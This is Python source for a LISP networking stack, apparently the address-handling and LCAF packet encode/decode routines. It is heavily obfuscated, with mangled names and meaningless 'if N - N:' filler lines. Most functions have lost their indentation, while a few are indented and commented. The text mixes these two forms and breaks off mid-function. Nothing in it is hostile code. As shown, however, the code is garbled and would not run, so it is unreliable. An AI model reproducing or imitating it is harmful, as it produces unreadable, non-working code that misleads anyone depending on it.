if 81 - 81: ooOoO0o / I1Ii111 + OOooOOo / Oo0Ooo / OoOoOO00
if 34 - 34: ooOoO0o * iIii1I11I1II1 % i11iIiiIii * OOooOOo - OOooOOo
if 63 - 63: Oo0Ooo / oO0o + iII111i % OoooooooOO * I11i
if 34 - 34: I1IiiI + I1Ii111 % ooOoO0o
if 24 - 24: Ii1I % II111iiii - i11iIiiIii
if 52 - 52: OoO0O00
if 76 - 76: ooOoO0o - iII111i % ooOoO0o / oO0o . OOooOOo
i11IIIi = ( addr_str [ 2 : 4 ] == "::" )
try :
addr_str = socket . inet_pton ( socket . AF_INET6 , addr_str )
except :
addr_str = socket . inet_pton ( socket . AF_INET6 , "0::0" )
if 57 - 57: OoOoOO00 . iII111i
addr_str = binascii . hexlify ( addr_str )
if 43 - 43: I1Ii111 * OOooOOo - IiII . i11iIiiIii
if ( i11IIIi ) :
addr_str = addr_str [ 2 : 4 ] + addr_str [ 0 : 2 ] + addr_str [ 4 : : ]
if 34 - 34: iII111i . OoOoOO00
self . address = int ( addr_str , 16 )
if 49 - 49: I1ii11iIi11i % oO0o - I1Ii111 . I1ii11iIi11i % II111iiii
elif ( self . is_geo_prefix ( ) ) :
OOoooo = lisp_geo ( None )
OOoooo . name = "geo-prefix-{}" . format ( OOoooo )
OOoooo . parse_geo_string ( addr_str )
self . address = OOoooo
elif ( self . is_mac ( ) ) :
addr_str = addr_str . replace ( "-" , "" )
Oooo0oOOO0 = int ( addr_str , 16 )
self . address = Oooo0oOOO0
elif ( self . is_e164 ( ) ) :
addr_str = addr_str [ 1 : : ]
Oooo0oOOO0 = int ( addr_str , 16 )
self . address = Oooo0oOOO0 << 4
elif ( self . is_dist_name ( ) ) :
self . address = addr_str . replace ( "'" , "" )
if 20 - 20: I1ii11iIi11i . iIii1I11I1II1 - Ii1I % OoO0O00
self . mask_len = self . host_mask_len ( )
if 27 - 27: iIii1I11I1II1 / I1Ii111 - I11i . OoO0O00 + ooOoO0o
if 89 - 89: I1IiiI % I11i - OOooOOo
def store_prefix ( self , prefix_str ) :
if ( self . is_geo_string ( prefix_str ) ) :
OO000o00 = prefix_str . find ( "]" )
Ooo0o00 = len ( prefix_str [ OO000o00 + 1 : : ] ) * 8
elif ( prefix_str . find ( "/" ) != - 1 ) :
prefix_str , Ooo0o00 = prefix_str . split ( "/" )
else :
IIIIIiII1 = prefix_str . find ( "'" )
if ( IIIIIiII1 == - 1 ) : return
iiiiI1iiiIi = prefix_str . find ( "'" , IIIIIiII1 + 1 )
if ( iiiiI1iiiIi == - 1 ) : return
Ooo0o00 = len ( prefix_str [ IIIIIiII1 + 1 : iiiiI1iiiIi ] ) * 8
if 71 - 71: OOooOOo % Oo0Ooo - o0oOOo0O0Ooo / I1Ii111 - O0 - oO0o
if 10 - 10: I1IiiI
self . string_to_afi ( prefix_str )
self . store_address ( prefix_str )
self . mask_len = int ( Ooo0o00 )
if 17 - 17: i11iIiiIii % o0oOOo0O0Ooo . ooOoO0o
if 34 - 34: OoooooooOO / iII111i / O0
def zero_host_bits ( self ) :
if ( self . mask_len < 0 ) : return
O0OO0O000o = ( 2 ** self . mask_len ) - 1
oOo00o0o = self . addr_length ( ) * 8 - self . mask_len
O0OO0O000o <<= oOo00o0o
self . address &= O0OO0O000o
if 25 - 25: Ii1I % i1IIi * I11i * Ii1I - IiII . i11iIiiIii
if 40 - 40: OOooOOo - OoooooooOO
def is_geo_string ( self , addr_str ) :
OO000o00 = addr_str . find ( "]" )
if ( OO000o00 != - 1 ) : addr_str = addr_str [ OO000o00 + 1 : : ]
if 36 - 36: i1IIi % OoOoOO00 - i1IIi
OOoooo = addr_str . split ( "/" )
if ( len ( OOoooo ) == 2 ) :
if ( OOoooo [ 1 ] . isdigit ( ) == False ) : return ( False )
if 5 - 5: I1IiiI . I1IiiI % II111iiii - I1Ii111
OOoooo = OOoooo [ 0 ]
OOoooo = OOoooo . split ( "-" )
o0OoOOoO0o0 = len ( OOoooo )
if ( o0OoOOoO0o0 < 8 or o0OoOOoO0o0 > 9 ) : return ( False )
if 48 - 48: O0 - I1ii11iIi11i * ooOoO0o - iII111i - Ii1I - I1Ii111
for iioo0O0o0oo0O in range ( 0 , o0OoOOoO0o0 ) :
if ( iioo0O0o0oo0O == 3 ) :
if ( OOoooo [ iioo0O0o0oo0O ] in [ "N" , "S" ] ) : continue
return ( False )
if 4 - 4: Ii1I + ooOoO0o * i11iIiiIii + iII111i
if ( iioo0O0o0oo0O == 7 ) :
if ( OOoooo [ iioo0O0o0oo0O ] in [ "W" , "E" ] ) : continue
return ( False )
if 77 - 77: OoO0O00 . iII111i
if ( OOoooo [ iioo0O0o0oo0O ] . isdigit ( ) == False ) : return ( False )
if 77 - 77: I1Ii111 . IiII % OoO0O00 + I1Ii111 % OoooooooOO
return ( True )
if 17 - 17: OoooooooOO - i1IIi * I11i
if 33 - 33: i1IIi . Oo0Ooo + I11i
def string_to_afi ( self , addr_str ) :
if ( addr_str . count ( "'" ) == 2 ) :
self . afi = LISP_AFI_NAME
return
if 97 - 97: OOooOOo / IiII / ooOoO0o / OoooooooOO
if ( addr_str . find ( ":" ) != - 1 ) : self . afi = LISP_AFI_IPV6
elif ( addr_str . find ( "." ) != - 1 ) : self . afi = LISP_AFI_IPV4
elif ( addr_str . find ( "+" ) != - 1 ) : self . afi = LISP_AFI_E164
elif ( self . is_geo_string ( addr_str ) ) : self . afi = LISP_AFI_GEO_COORD
elif ( addr_str . find ( "-" ) != - 1 ) : self . afi = LISP_AFI_MAC
else : self . afi = LISP_AFI_NONE
if 78 - 78: I1Ii111 + I1Ii111
if 43 - 43: I1Ii111 * o0oOOo0O0Ooo + i1IIi
def print_address ( self ) :
O0o00o000oO = self . print_address_no_iid ( )
oOo00Ooo0o0 = "[" + str ( self . instance_id )
for i1i1IIIIIIIi in self . iid_list : oOo00Ooo0o0 += "," + str ( i1i1IIIIIIIi )
oOo00Ooo0o0 += "]"
O0o00o000oO = "{}{}" . format ( oOo00Ooo0o0 , O0o00o000oO )
return ( O0o00o000oO )
if 19 - 19: Ii1I
if 51 - 51: oO0o
def print_address_no_iid ( self ) :
if ( self . is_ipv4 ( ) ) :
O0o00o000oO = self . address
OoOO00OO = O0o00o000oO >> 24
IIii1iiI = ( O0o00o000oO >> 16 ) & 0xff
II1 = ( O0o00o000oO >> 8 ) & 0xff
ooO0oo = O0o00o000oO & 0xff
return ( "{}.{}.{}.{}" . format ( OoOO00OO , IIii1iiI , II1 , ooO0oo ) )
elif ( self . is_ipv6 ( ) ) :
oOo0O = lisp_hex_string ( self . address ) . zfill ( 32 )
oOo0O = binascii . unhexlify ( oOo0O )
oOo0O = socket . inet_ntop ( socket . AF_INET6 , oOo0O )
return ( "{}" . format ( oOo0O ) )
elif ( self . is_geo_prefix ( ) ) :
return ( "{}" . format ( self . address . print_geo ( ) ) )
elif ( self . is_mac ( ) ) :
oOo0O = lisp_hex_string ( self . address ) . zfill ( 12 )
oOo0O = "{}-{}-{}" . format ( oOo0O [ 0 : 4 ] , oOo0O [ 4 : 8 ] ,
oOo0O [ 8 : 12 ] )
return ( "{}" . format ( oOo0O ) )
elif ( self . is_e164 ( ) ) :
oOo0O = lisp_hex_string ( self . address ) . zfill ( 15 )
return ( "+{}" . format ( oOo0O ) )
elif ( self . is_dist_name ( ) ) :
return ( "'{}'" . format ( self . address ) )
elif ( self . is_null ( ) ) :
return ( "no-address" )
if 56 - 56: II111iiii + II111iiii - I1ii11iIi11i
return ( "unknown-afi:{}" . format ( self . afi ) )
if 48 - 48: I1Ii111 / I1ii11iIi11i % OOooOOo
if 8 - 8: O0 . IiII - ooOoO0o * OoOoOO00 / OoO0O00 - O0
def print_prefix ( self ) :
if ( self . is_ultimate_root ( ) ) : return ( "[*]" )
if ( self . is_iid_range ( ) ) :
if ( self . mask_len == 32 ) : return ( "[{}]" . format ( self . instance_id ) )
I1I1i11i1I1 = self . instance_id + ( 2 ** ( 32 - self . mask_len ) - 1 )
return ( "[{}-{}]" . format ( self . instance_id , I1I1i11i1I1 ) )
if 48 - 48: iIii1I11I1II1 + i1IIi . I1IiiI % OoO0O00 - iIii1I11I1II1 / i1IIi
O0o00o000oO = self . print_address ( )
if ( self . is_dist_name ( ) ) : return ( O0o00o000oO )
if ( self . is_geo_prefix ( ) ) : return ( O0o00o000oO )
if 14 - 14: IiII . I11i
OO000o00 = O0o00o000oO . find ( "no-address" )
if ( OO000o00 == - 1 ) :
O0o00o000oO = "{}/{}" . format ( O0o00o000oO , str ( self . mask_len ) )
else :
O0o00o000oO = O0o00o000oO [ 0 : OO000o00 ]
if 13 - 13: OoOoOO00 - I11i . OOooOOo % OoO0O00
return ( O0o00o000oO )
if 79 - 79: iII111i / Ii1I % i11iIiiIii . I1IiiI % OoO0O00 / i11iIiiIii
if 100 - 100: OOooOOo + Oo0Ooo . iIii1I11I1II1 . ooOoO0o * Oo0Ooo
def print_prefix_no_iid ( self ) :
O0o00o000oO = self . print_address_no_iid ( )
if ( self . is_dist_name ( ) ) : return ( O0o00o000oO )
if ( self . is_geo_prefix ( ) ) : return ( O0o00o000oO )
return ( "{}/{}" . format ( O0o00o000oO , str ( self . mask_len ) ) )
if 16 - 16: Oo0Ooo % OoOoOO00 + I1Ii111 % I1Ii111
if 12 - 12: I1Ii111 . Ii1I / iIii1I11I1II1 + i1IIi
def print_prefix_url ( self ) :
if ( self . is_ultimate_root ( ) ) : return ( "0--0" )
O0o00o000oO = self . print_address ( )
OO000o00 = O0o00o000oO . find ( "]" )
if ( OO000o00 != - 1 ) : O0o00o000oO = O0o00o000oO [ OO000o00 + 1 : : ]
if ( self . is_geo_prefix ( ) ) :
O0o00o000oO = O0o00o000oO . replace ( "/" , "-" )
return ( "{}-{}" . format ( self . instance_id , O0o00o000oO ) )
if 9 - 9: iIii1I11I1II1
return ( "{}-{}-{}" . format ( self . instance_id , O0o00o000oO , self . mask_len ) )
if 75 - 75: I11i . II111iiii * I1IiiI * IiII
if 36 - 36: OOooOOo / I1ii11iIi11i / oO0o / ooOoO0o / I11i
def print_sg ( self , g ) :
o0 = self . print_prefix ( )
III1iIIIi = o0 . find ( "]" ) + 1
g = g . print_prefix ( )
IIi1IiiIiiI = g . find ( "]" ) + 1
iii1IiI1I1 = "[{}]({}, {})" . format ( self . instance_id , o0 [ III1iIIIi : : ] , g [ IIi1IiiIiiI : : ] )
return ( iii1IiI1I1 )
if 47 - 47: II111iiii / o0oOOo0O0Ooo * o0oOOo0O0Ooo + oO0o
if 3 - 3: Oo0Ooo
def hash_address ( self , addr ) :
IiiiI1 = self . address
I1IIIi = addr . address
if 82 - 82: OoooooooOO + OoO0O00 . OoO0O00 * OoO0O00
if ( self . is_geo_prefix ( ) ) : IiiiI1 = self . address . print_geo ( )
if ( addr . is_geo_prefix ( ) ) : I1IIIi = addr . address . print_geo ( )
if 99 - 99: I1ii11iIi11i - OoooooooOO - Ii1I / Oo0Ooo
if ( type ( IiiiI1 ) == str ) :
IiiiI1 = int ( binascii . hexlify ( IiiiI1 [ 0 : 1 ] ) )
if 96 - 96: o0oOOo0O0Ooo . II111iiii
if ( type ( I1IIIi ) == str ) :
I1IIIi = int ( binascii . hexlify ( I1IIIi [ 0 : 1 ] ) )
if 14 - 14: OoooooooOO - i1IIi / i11iIiiIii - OOooOOo - i11iIiiIii . ooOoO0o
return ( IiiiI1 ^ I1IIIi )
if 8 - 8: oO0o * O0 - II111iiii + I1IiiI
if 85 - 85: OoooooooOO % i11iIiiIii / IiII % OoOoOO00 + O0
if 6 - 6: OoooooooOO
if 97 - 97: II111iiii + o0oOOo0O0Ooo * II111iiii
if 17 - 17: o0oOOo0O0Ooo / ooOoO0o + i1IIi
if 78 - 78: iIii1I11I1II1 * o0oOOo0O0Ooo * Oo0Ooo - OoO0O00 / OoO0O00
 def is_more_specific ( self , prefix ) :
  # Return True when self falls under (is covered by) 'prefix'.
  # An ultimate-root prefix covers every EID.
  if ( prefix . afi == LISP_AFI_ULTIMATE_ROOT ) : return ( True )
  if 89 - 89: o0oOOo0O0Ooo % o0oOOo0O0Ooo
  Ooo0o00 = prefix . mask_len
  # An IID-range prefix covers self when self's instance-id falls in a
  # block of 2**(32 - mask_len) ids starting at prefix.instance_id.
  if ( prefix . afi == LISP_AFI_IID_RANGE ) :
   i1IIIii111 = 2 ** ( 32 - Ooo0o00 )
   IIIiI1 = prefix . instance_id
   I1I1i11i1I1 = IIIiI1 + i1IIIii111
   return ( self . instance_id in range ( IIIiI1 , I1I1i11i1I1 ) )
  if 3 - 3: iIii1I11I1II1 / I1IiiI % OoO0O00 . I1Ii111
  if 46 - 46: I11i % iII111i % iII111i / I11i / I1IiiI
  # Otherwise instance-ids must match exactly; AFIs must match unless
  # 'prefix' carries AFI_NONE (address-family wildcard).
  if ( self . instance_id != prefix . instance_id ) : return ( False )
  if ( self . afi != prefix . afi ) :
   if ( prefix . afi != LISP_AFI_NONE ) : return ( False )
  if 74 - 74: oO0o / iIii1I11I1II1 + Oo0Ooo * ooOoO0o % iII111i % i1IIi
  if 68 - 68: OoooooooOO
  if 81 - 81: OoO0O00 % i1IIi
  if 95 - 95: Oo0Ooo - O0 / I1ii11iIi11i . I1IiiI / o0oOOo0O0Ooo % OoOoOO00
  if 38 - 38: OoOoOO00 % OoooooooOO . oO0o - OoooooooOO + I11i
  # Non-binary addresses (distinguished-names, geo-prefixes) compare as
  # strings: self is more specific when 'prefix' is a leading substring.
  if ( self . is_binary ( ) == False ) :
   if ( prefix . afi == LISP_AFI_NONE ) : return ( True )
   if ( type ( self . address ) != type ( prefix . address ) ) : return ( False )
   O0o00o000oO = self . address
   Ii11III = prefix . address
   if ( self . is_geo_prefix ( ) ) :
    O0o00o000oO = self . address . print_geo ( )
    Ii11III = prefix . address . print_geo ( )
   if 42 - 42: oO0o % OoOoOO00 - oO0o + I11i / i11iIiiIii
   if ( len ( O0o00o000oO ) < len ( Ii11III ) ) : return ( False )
   return ( O0o00o000oO . find ( Ii11III ) == 0 )
  if 74 - 74: OoO0O00 - II111iiii - ooOoO0o % i1IIi
  if 42 - 42: i11iIiiIii / O0
  if 8 - 8: I1Ii111
  if 51 - 51: i11iIiiIii
  if 1 - 1: iIii1I11I1II1 . i1IIi . i11iIiiIii % I1ii11iIi11i
  # Binary (integer) comparison: self must be at least as long as
  # 'prefix' and agree with it under prefix's network mask.
  if ( self . mask_len < Ooo0o00 ) : return ( False )
  if 58 - 58: i11iIiiIii * i11iIiiIii - OoO0O00
  oOo00o0o = ( prefix . addr_length ( ) * 8 ) - Ooo0o00
  O0OO0O000o = ( 2 ** Ooo0o00 - 1 ) << oOo00o0o
  return ( ( self . address & O0OO0O000o ) == prefix . address )
if 8 - 8: i11iIiiIii * OoOoOO00 . o0oOOo0O0Ooo
if 27 - 27: I1ii11iIi11i + Ii1I % I1Ii111
def mask_address ( self , mask_len ) :
oOo00o0o = ( self . addr_length ( ) * 8 ) - mask_len
O0OO0O000o = ( 2 ** mask_len - 1 ) << oOo00o0o
self . address &= O0OO0O000o
if 20 - 20: Oo0Ooo
if 33 - 33: oO0o - OoOoOO00 - i11iIiiIii + I1Ii111 + iIii1I11I1II1
def is_exact_match ( self , prefix ) :
if ( self . instance_id != prefix . instance_id ) : return ( False )
Iii1i1 = self . print_prefix ( )
o0o00o0 = prefix . print_prefix ( ) if prefix else ""
return ( Iii1i1 == o0o00o0 )
if 92 - 92: oO0o * Ii1I / OoO0O00 % II111iiii
if 54 - 54: oO0o + I11i - OoO0O00
def is_local ( self ) :
if ( self . is_ipv4 ( ) ) :
oOoI1 = lisp_myrlocs [ 0 ]
if ( oOoI1 == None ) : return ( False )
oOoI1 = oOoI1 . print_address_no_iid ( )
return ( self . print_address_no_iid ( ) == oOoI1 )
if 22 - 22: OoooooooOO + OoOoOO00 - Ii1I . iII111i / OoooooooOO / I1IiiI
if ( self . is_ipv6 ( ) ) :
oOoI1 = lisp_myrlocs [ 1 ]
if ( oOoI1 == None ) : return ( False )
oOoI1 = oOoI1 . print_address_no_iid ( )
return ( self . print_address_no_iid ( ) == oOoI1 )
if 73 - 73: i1IIi - Ii1I + oO0o * iIii1I11I1II1
return ( False )
if 100 - 100: i11iIiiIii / iIii1I11I1II1 + Oo0Ooo + OoO0O00 - iII111i
if 8 - 8: i11iIiiIii . O0 + o0oOOo0O0Ooo * oO0o + II111iiii
def store_iid_range ( self , iid , mask_len ) :
if ( self . afi == LISP_AFI_NONE ) :
if ( iid is 0 and mask_len is 0 ) : self . afi = LISP_AFI_ULTIMATE_ROOT
else : self . afi = LISP_AFI_IID_RANGE
if 61 - 61: ooOoO0o / ooOoO0o
self . instance_id = iid
self . mask_len = mask_len
if 51 - 51: iIii1I11I1II1 / oO0o * I1Ii111 + i1IIi
if 96 - 96: Oo0Ooo + oO0o - Oo0Ooo - OoOoOO00 % OOooOOo . iIii1I11I1II1
def lcaf_length ( self , lcaf_type ) :
iI1 = self . addr_length ( ) + 2
if ( lcaf_type == LISP_LCAF_AFI_LIST_TYPE ) : iI1 += 4
if ( lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE ) : iI1 += 4
if ( lcaf_type == LISP_LCAF_ASN_TYPE ) : iI1 += 4
if ( lcaf_type == LISP_LCAF_APP_DATA_TYPE ) : iI1 += 8
if ( lcaf_type == LISP_LCAF_GEO_COORD_TYPE ) : iI1 += 12
if ( lcaf_type == LISP_LCAF_OPAQUE_TYPE ) : iI1 += 0
if ( lcaf_type == LISP_LCAF_NAT_TYPE ) : iI1 += 4
if ( lcaf_type == LISP_LCAF_NONCE_LOC_TYPE ) : iI1 += 4
if ( lcaf_type == LISP_LCAF_MCAST_INFO_TYPE ) : iI1 = iI1 * 2 + 8
if ( lcaf_type == LISP_LCAF_ELP_TYPE ) : iI1 += 0
if ( lcaf_type == LISP_LCAF_SECURITY_TYPE ) : iI1 += 6
if ( lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE ) : iI1 += 4
if ( lcaf_type == LISP_LCAF_RLE_TYPE ) : iI1 += 4
return ( iI1 )
if 93 - 93: iIii1I11I1II1 % OoooooooOO
if 6 - 6: II111iiii / oO0o - OOooOOo . O0 - o0oOOo0O0Ooo
if 72 - 72: iIii1I11I1II1 / OoooooooOO * ooOoO0o / ooOoO0o % O0 + IiII
if 96 - 96: iII111i / i11iIiiIii + Oo0Ooo . I1IiiI + iII111i % OoOoOO00
if 19 - 19: i11iIiiIii . Oo0Ooo . OoOoOO00 - I1IiiI
if 85 - 85: I11i - OoO0O00 % iIii1I11I1II1 . iII111i + ooOoO0o . Oo0Ooo
if 87 - 87: iII111i
if 86 - 86: IiII - I11i
if 99 - 99: i1IIi + I1ii11iIi11i
if 24 - 24: ooOoO0o / OoooooooOO % I1ii11iIi11i * ooOoO0o
if 14 - 14: I1ii11iIi11i + OoO0O00 - I1IiiI - Oo0Ooo
if 44 - 44: II111iiii / I1ii11iIi11i
if 39 - 39: OoooooooOO % OoO0O00
if 83 - 83: OOooOOo % I1IiiI + O0 % OoooooooOO
if 84 - 84: I11i - Oo0Ooo % ooOoO0o - II111iiii
if 29 - 29: IiII
if 4 - 4: II111iiii * o0oOOo0O0Ooo - IiII * iII111i
 def lcaf_encode_iid ( self ) :
  # Encode self as an Instance-ID LCAF: 6-byte LCAF header, 32-bit
  # instance-id, 16-bit AFI, then the address body (a nested geo-coord
  # LCAF for geo EIDs).  Returns the packed bytes.
  iiii1II = LISP_LCAF_INSTANCE_ID_TYPE
  IIiIi1II1IiI = socket . htons ( self . lcaf_length ( iiii1II ) )
  oOo00Ooo0o0 = self . instance_id
  oO0oO00 = self . afi
  O0ooOo = 0
  # Negative AFIs are internal pseudo-AFIs: geo-coords nest another
  # LCAF; all others encode AFI 0, carrying the mask-len in the LCAF
  # header's IID mask-len field instead.
  if ( oO0oO00 < 0 ) :
   if ( self . afi == LISP_AFI_GEO_COORD ) :
    oO0oO00 = LISP_AFI_LCAF
    O0ooOo = 0
   else :
    oO0oO00 = 0
    O0ooOo = self . mask_len
   if 91 - 91: I1Ii111 * iII111i * OoO0O00
  if 79 - 79: iII111i + oO0o
  if 19 - 19: I1Ii111 - OOooOOo . ooOoO0o . O0 + II111iiii . OoooooooOO
  oooO = struct . pack ( "BBBBH" , 0 , 0 , iiii1II , O0ooOo , IIiIi1II1IiI )
  oooO += struct . pack ( "IH" , socket . htonl ( oOo00Ooo0o0 ) , socket . htons ( oO0oO00 ) )
  # AFI 0 means no address body follows.
  if ( oO0oO00 == 0 ) : return ( oooO )
  if 100 - 100: oO0o
  # Geo-coord: drop the 2 AFI bytes just written and splice in the
  # nested geo-coord LCAF, which carries its own AFI field.
  if ( self . afi == LISP_AFI_GEO_COORD ) :
   oooO = oooO [ 0 : - 2 ]
   oooO += self . address . encode_geo ( )
   return ( oooO )
  if 7 - 7: i11iIiiIii - O0
  if 76 - 76: i1IIi . OOooOOo * iIii1I11I1II1 / I1ii11iIi11i % i11iIiiIii / O0
  oooO += self . pack_address ( )
  return ( oooO )
if 83 - 83: oO0o % OoooooooOO
if 36 - 36: IiII * OoOoOO00 - iIii1I11I1II1 + II111iiii
 def lcaf_decode_iid ( self , packet ) :
  # Decode an Instance-ID LCAF into self.  Returns the remaining packet
  # bytes on success, or None when the encoding is truncated/invalid.
  o00OooooOOOO = "BBBBH"
  oO0o00O = struct . calcsize ( o00OooooOOOO )
  if ( len ( packet ) < oO0o00O ) : return ( None )
  if 65 - 65: I1IiiI * I11i . I1Ii111 % I1ii11iIi11i + O0
  # Fields: rsvd1, flags, lcaf-type, IID mask-len, LCAF length.
  OoOO0OOOO0 , oOoOoO0Oo0oo , iiii1II , Oo00OOOo00 , iI1 = struct . unpack ( o00OooooOOOO ,
   packet [ : oO0o00O ] )
  packet = packet [ oO0o00O : : ]
  if 11 - 11: OOooOOo % OOooOOo - i11iIiiIii - o0oOOo0O0Ooo
  if ( iiii1II != LISP_LCAF_INSTANCE_ID_TYPE ) : return ( None )
  if 23 - 23: iII111i * OoO0O00 + o0oOOo0O0Ooo - I1ii11iIi11i % O0 - Oo0Ooo
  o00OooooOOOO = "IH"
  oO0o00O = struct . calcsize ( o00OooooOOOO )
  if ( len ( packet ) < oO0o00O ) : return ( None )
  if 42 - 42: I11i . I1ii11iIi11i - I11i . OoOoOO00
  oOo00Ooo0o0 , oO0oO00 = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
  packet = packet [ oO0o00O : : ]
  if 46 - 46: iII111i
  iI1 = socket . ntohs ( iI1 )
  self . instance_id = socket . ntohl ( oOo00Ooo0o0 )
  oO0oO00 = socket . ntohs ( oO0oO00 )
  self . afi = oO0oO00
  # With AFI 0, a non-zero header mask-len is an IID-range width; zero
  # means the ultimate root.
  if ( Oo00OOOo00 != 0 and oO0oO00 == 0 ) : self . mask_len = Oo00OOOo00
  if ( oO0oO00 == 0 ) :
   self . afi = LISP_AFI_IID_RANGE if Oo00OOOo00 else LISP_AFI_ULTIMATE_ROOT
  if 82 - 82: Oo0Ooo % Ii1I * I1Ii111
  if 74 - 74: OoO0O00 - oO0o * I1Ii111
  if 50 - 50: Ii1I % i11iIiiIii - I1Ii111
  if 32 - 32: iIii1I11I1II1 + i1IIi - iII111i + i1IIi / OoOoOO00
  if 29 - 29: OOooOOo
  # AFI 0: no address body follows.
  if ( oO0oO00 == 0 ) : return ( packet )
  if 18 - 18: iII111i - OoO0O00 + oO0o
  if 55 - 55: OoO0O00 / Ii1I % ooOoO0o . I1Ii111 * i1IIi . i11iIiiIii
  if 34 - 34: I1ii11iIi11i % o0oOOo0O0Ooo % ooOoO0o * Ii1I * I1Ii111
  if 59 - 59: Ii1I + Oo0Ooo % O0 % i1IIi - iII111i
  # Distinguished-name EID: variable-length, mask-len tracked in bits.
  if ( self . is_dist_name ( ) ) :
   packet , self . address = lisp_decode_dist_name ( packet )
   self . mask_len = len ( self . address ) * 8
   return ( packet )
  if 4 - 4: O0 - oO0o % OoO0O00 % OoooooooOO
  if 67 - 67: I11i
  if 23 - 23: I1ii11iIi11i - OoOoOO00
  if 90 - 90: ooOoO0o - I11i / OoOoOO00
  if 12 - 12: II111iiii % I1IiiI - I1ii11iIi11i
  # Nested LCAF: only geo-coordinates are handled here.
  if ( oO0oO00 == LISP_AFI_LCAF ) :
   o00OooooOOOO = "BBBBH"
   oO0o00O = struct . calcsize ( o00OooooOOOO )
   if ( len ( packet ) < oO0o00O ) : return ( None )
   if 24 - 24: Ii1I + I11i
   Ooo0o00O0O0oO , OO000OOO , iiii1II , o000OOooo000O , o00O0oOO0o = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
   if 5 - 5: I1Ii111 . Ii1I - ooOoO0o % OoooooooOO
   if 2 - 2: OOooOOo . IiII . iII111i / Oo0Ooo
   if ( iiii1II != LISP_LCAF_GEO_COORD_TYPE ) : return ( None )
   if 86 - 86: OOooOOo . o0oOOo0O0Ooo - iIii1I11I1II1
   o00O0oOO0o = socket . ntohs ( o00O0oOO0o )
   packet = packet [ oO0o00O : : ]
   if ( o00O0oOO0o > len ( packet ) ) : return ( None )
   if 12 - 12: oO0o + iII111i
   OOoooo = lisp_geo ( "" )
   self . afi = LISP_AFI_GEO_COORD
   self . address = OOoooo
   packet = OOoooo . decode_geo ( packet , o00O0oOO0o , o000OOooo000O )
   self . mask_len = self . host_mask_len ( )
   return ( packet )
  if 16 - 16: O0 + oO0o - ooOoO0o * O0 . I1ii11iIi11i . oO0o
  if 4 - 4: I1Ii111
  # Fixed-length binary address body (IPv4/IPv6/MAC ...).
  IIiIi1II1IiI = self . addr_length ( )
  if ( len ( packet ) < IIiIi1II1IiI ) : return ( None )
  if 39 - 39: OoOoOO00 - I1Ii111 / I11i + II111iiii * I1IiiI * I1IiiI
  packet = self . unpack_address ( packet )
  return ( packet )
if 9 - 9: IiII * I1IiiI * OoO0O00 - I1IiiI * I1IiiI - OoO0O00
if 20 - 20: i1IIi + I1IiiI + i11iIiiIii + II111iiii + i1IIi
if 18 - 18: i11iIiiIii * O0 * Oo0Ooo + iII111i + OOooOOo
if 62 - 62: OOooOOo - oO0o + i1IIi % Ii1I . I1Ii111 . II111iiii
if 94 - 94: OOooOOo - I1IiiI
if 35 - 35: i11iIiiIii
if 27 - 27: O0 % i11iIiiIii - I1Ii111 * oO0o - I11i / Oo0Ooo
if 78 - 78: O0 * i11iIiiIii
if 62 - 62: OoO0O00 * I1Ii111 * Ii1I / ooOoO0o
if 27 - 27: oO0o . iII111i . oO0o
if 37 - 37: Oo0Ooo . I1ii11iIi11i / OoooooooOO % ooOoO0o / I1IiiI + ooOoO0o
if 14 - 14: I11i + ooOoO0o . oO0o * I11i
if 98 - 98: Ii1I . i1IIi * OoO0O00 * Ii1I * iIii1I11I1II1
if 22 - 22: OoooooooOO - OoO0O00 + OoOoOO00 - OOooOOo + i11iIiiIii - oO0o
if 9 - 9: I1Ii111 - i1IIi . ooOoO0o
if 33 - 33: I11i
if 37 - 37: Oo0Ooo
if 36 - 36: IiII % I11i
if 72 - 72: oO0o % I11i % OOooOOo * iIii1I11I1II1 - OOooOOo % O0
if 84 - 84: oO0o - o0oOOo0O0Ooo / II111iiii . o0oOOo0O0Ooo
if 82 - 82: OoooooooOO
def lcaf_encode_sg ( self , group ) :
iiii1II = LISP_LCAF_MCAST_INFO_TYPE
oOo00Ooo0o0 = socket . htonl ( self . instance_id )
IIiIi1II1IiI = socket . htons ( self . lcaf_length ( iiii1II ) )
oooO = struct . pack ( "BBBBHIHBB" , 0 , 0 , iiii1II , 0 , IIiIi1II1IiI , oOo00Ooo0o0 ,
0 , self . mask_len , group . mask_len )
if 14 - 14: OoO0O00 / oO0o - OOooOOo
oooO += struct . pack ( "H" , socket . htons ( self . afi ) )
oooO += self . pack_address ( )
oooO += struct . pack ( "H" , socket . htons ( group . afi ) )
oooO += group . pack_address ( )
return ( oooO )
if 100 - 100: IiII - I11i . iIii1I11I1II1 / iIii1I11I1II1
if 16 - 16: IiII + Oo0Ooo % I11i
 def lcaf_decode_sg ( self , packet ) :
  # Decode a Multicast-Info LCAF: self becomes the source EID and a new
  # lisp_address is created for the group.  Returns [remaining-packet,
  # group-address] on success or [None, None] on any format error.
  o00OooooOOOO = "BBBBHIHBB"
  oO0o00O = struct . calcsize ( o00OooooOOOO )
  if ( len ( packet ) < oO0o00O ) : return ( [ None , None ] )
  if 16 - 16: ooOoO0o / I1Ii111
  # Fields: rsvd1, flags, type, rsvd2, length, instance-id, reserved,
  # source mask-len, group mask-len.
  OoOO0OOOO0 , oOoOoO0Oo0oo , iiii1II , O0Ooo000Ooo , iI1 , oOo00Ooo0o0 , OOOoO0Oo , iI1i1i , iiii = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
  if 54 - 54: iIii1I11I1II1 % ooOoO0o
  packet = packet [ oO0o00O : : ]
  if 37 - 37: OOooOOo % OoOoOO00 - II111iiii * o0oOOo0O0Ooo . I1IiiI . OoOoOO00
  if ( iiii1II != LISP_LCAF_MCAST_INFO_TYPE ) : return ( [ None , None ] )
  if 92 - 92: I11i + OoO0O00 . OoooooooOO
  self . instance_id = socket . ntohl ( oOo00Ooo0o0 )
  # LCAF length remaining after the 8 post-length header bytes already
  # consumed above.
  iI1 = socket . ntohs ( iI1 ) - 8
  if 3 - 3: OoO0O00 % iIii1I11I1II1
  if 62 - 62: OoooooooOO * o0oOOo0O0Ooo
  if 59 - 59: iIii1I11I1II1
  if 18 - 18: ooOoO0o % I1IiiI / iIii1I11I1II1 + O0
  if 99 - 99: i11iIiiIii - o0oOOo0O0Ooo + o0oOOo0O0Ooo . OoooooooOO * iII111i . Oo0Ooo
  # Source: 16-bit AFI, then the address body, decoded into self.
  o00OooooOOOO = "H"
